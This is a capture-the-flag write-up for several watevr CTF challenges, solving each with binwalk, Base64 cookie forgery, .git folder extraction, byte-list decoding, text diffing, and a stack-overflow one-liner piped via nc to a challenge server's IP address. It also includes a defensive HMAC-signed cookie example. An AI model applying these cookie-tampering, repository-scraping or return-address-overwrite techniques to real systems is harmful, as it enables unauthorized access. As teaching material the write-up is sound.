Forensics

Evil Cuteness

Omg, look at that cute kitty! It’s so cute I can’t take my eyes off it! Wait, where did my flag go?

We can get an image kitty.png


If we run binwalk on it, we find an embedded zip file. Using foremost and unzip to extract it, we get the flag watevr{7h475_4c7u4lly_r34lly_cu73_7h0u6h}.


Web


We need $100 to buy the flag. If we Base64-decode the cookie with echo -n "eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==" | base64 -D, we get {"money": 50, "history": []}.

We can modify the cookie to {"money": 100, "history": []} using echo -n "{\"money\": 100, \"history\": []}" | base64 to get the modified cookie eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0=.

Once we insert it, we can buy the flag watevr{b64_15_4_6r347_3ncryp710n_m37h0d}.
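The cookie is accepted after editing because it is only Base64-encoded and carries no integrity check. The following is an added example, not the challenge's server code: it puts that unsigned scheme next to an HMAC-signed variant that rejects a modified payload. SERVER_KEY and all function names are assumptions made for the illustration.

```python
import base64
import hashlib
import hmac
import json

# Hypothetical server-side key (constructed for this example).
SERVER_KEY = b"constructed-demo-key-not-from-the-challenge"


def encode_unsigned(state: dict) -> str:
    """Scheme seen in the write-up: Base64 of the JSON state, nothing else."""
    return base64.b64encode(json.dumps(state).encode()).decode()


def decode_unsigned(cookie: str) -> dict:
    """Trusts whatever the client sends back."""
    return json.loads(base64.b64decode(cookie))


def _tag(payload: str, key: bytes) -> str:
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def encode_signed(state: dict, key: bytes = SERVER_KEY) -> str:
    """Base64 payload plus an HMAC-SHA256 tag computed with the server key."""
    payload = base64.urlsafe_b64encode(json.dumps(state).encode()).decode()
    return f"{payload}.{_tag(payload, key)}"


def decode_signed(cookie: str, key: bytes = SERVER_KEY):
    """Return the state only if the tag verifies, otherwise None."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None  # no tag at all, e.g. a plain Base64 cookie
    # Constant-time comparison on bytes, so odd client input cannot raise.
    if not hmac.compare_digest(_tag(payload, key).encode(), tag.encode()):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))


def swap_payload(cookie: str, new_state: dict) -> str:
    """Model a client that edits the payload but can only reuse the old tag."""
    _, _, tag = cookie.rpartition(".")
    payload = base64.urlsafe_b64encode(json.dumps(new_state).encode()).decode()
    return f"{payload}.{tag}"
```

Keeping the balance in server-side session storage and sending only a random session identifier avoids trusting client-held state at all.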


Swedish State Archive

The Swedish State Archive are working on their new site, but it’s not quite finished yet…

From the source code, I saw a file web_server.py. If we check this, there is a line telling us Please do not access the .git-folder. So, we can use a Python script, git_extract.py, from GitHub, or another Git extraction tool. We run python git_extract.py http://13.53.175.227:50000/.git/, and we can see our flag in flag.txt: watevr{everything_is_offentligt}.


Reverse

Timeout

In the source code, we find a string stored as a list of byte values. We translate it into ASCII with a Python script.

l = [0x23,0x3c,0x49,100,0x55,0x2e,0x77,0x20,0x2d,0x73,0x3f,0x7d,0x2c,0x38,0x6c,0x53,0x54,0x2a,0x5a,0x6a,0x57,0x3a,0x66,0x5e,0x4d,0x36,0x65,0x6e,0x70,0x68,99,0x2f,0x4f,0x76,0x25,0x4b,0xb,0x34,0x4c,0x52,0x67,0x60,0x5f,0x45,0x7b,0x72,0x3b,0x7e,0x4a,10,0x6b,0x71,0x43,0x24,0x5c,0x28,0x22,0x40,0x32,0x44,0x62,0x50,0xd,0x26,0x31,0x37,0xc,0x5d,0x79,0x3e,0x3d,0x78,0x61,0x56,0x59,0x41,0x5b,0x42,0x46,0x33,0xb4,0x21,0x74,0x51,0x48,0x75,0x30,0x58,0x69,0x35,0x7c,9,0x39,0x4e,0x2b,0x7a,0x6d,0x47,0x29,0x6f,0,0x77,0x61,0x74,0x65,0x76,0x72,0x7b,0x33,0x6e,99,0x72,0x79,0x74,0x69,0x6f,0x6e,0x5f,0x69,0x73,0x5f,0x6f,0x76,0x65,0x72,0x72,0x61,0x74,0x65,100,0x5f,0x79,0x6f,0x75,0x74,0x75,0x62,0x65,0x2e,99,0x6f,0x6d,0x2f,0x77,0x61,0x74,99,0x68,0x3f,0x76,0x3d,0x4f,0x50,0x66,0x30,0x59,0x62,0x58,0x71,0x44,0x6d,0x30,0x7d,0]

print(''.join(chr(x) for x in l))

And we can get the flag watevr{3ncrytion_is_overrated_youtube.com/watch?v=OPf0YbXqDm0}.


Misc

Unspaellablle

I think the author of this episode’s script had a stroke or something… Or maybe it’s just me?

It gives us a file chall.txt, and here is part of it.

Local Picture

We can find the same text on the Internet, but chall.txt adds some extra characters to it, such as in "are playing a game of cawrds.", where cawrds should be cards. We use diff to compare the version from the Internet with chall.txt, take all the extra characters out, and get the flag watevr{icantspeel_tiny.cc/2qtdez}.


Pwn

Voting Machine 1

In a world with many uncertainties we need some kind of structure. Democracy is a big part of that, therefore we need voting machines! Well, at least if they are safe…

The pseudocode is as follows.

Local Picture

Local Picture

If we overwrite the 2 bytes of local_a and the 8 bytes of saved rbp, we can control rip. super_secret_function gives us the flag, and the address of the function is 0x00000400807.

Once we run (python -c 'print("A"*10+"\x07\x08\x40\x00\x00\x00\x00\x00")') | nc 13.48.67.196 50000, we get the flag watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}.